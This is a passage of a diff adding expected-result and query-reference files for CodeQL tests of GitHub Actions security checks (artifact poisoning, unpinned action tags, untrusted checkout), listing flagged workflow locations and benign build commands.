| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
new file mode 100644
index 000000000000..4f8d2af04e8d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
@@ -0,0 +1,2 @@
+Security/CWE-829/ArtifactPoisoningCritical.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
new file mode 100644
index 000000000000..09aed9e34a10
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
@@ -0,0 +1,54 @@ +edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | 
provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | +nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | +| 
.github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | 
PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref new file mode 100644 index 000000000000..39548f274127 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningMedium.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected new file mode 100644 index 000000000000..10c1cd1ded6d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected @@ -0,0 +1 @@ +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | Potential artifact poisoning | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref new file mode 100644 index 000000000000..7082dbada272 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningPathTraversal.ql + 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
new file mode 100644
index 000000000000..848962e26bd6
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
@@ -0,0 +1,34 @@ +| .github/workflows/actor_trusted_checkout.yml:19:13:19:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:13:23:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning101.yml:11:15:11:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ 
uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ 
uses 'some-action/some-repo' with ref 'latest', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:25:13:25:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | 
Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 
3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/test17.yml:20:21:20:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Uses Step | +| .github/workflows/test18.yml:37:21:37:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 
'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref new file mode 100644 index 000000000000..8c9db66bf6bb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnpinnedActionsTag.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected new file mode 100644 index 000000000000..365e9c823fac --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -0,0 +1,363 @@ +edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | 
.github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | 
Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| 
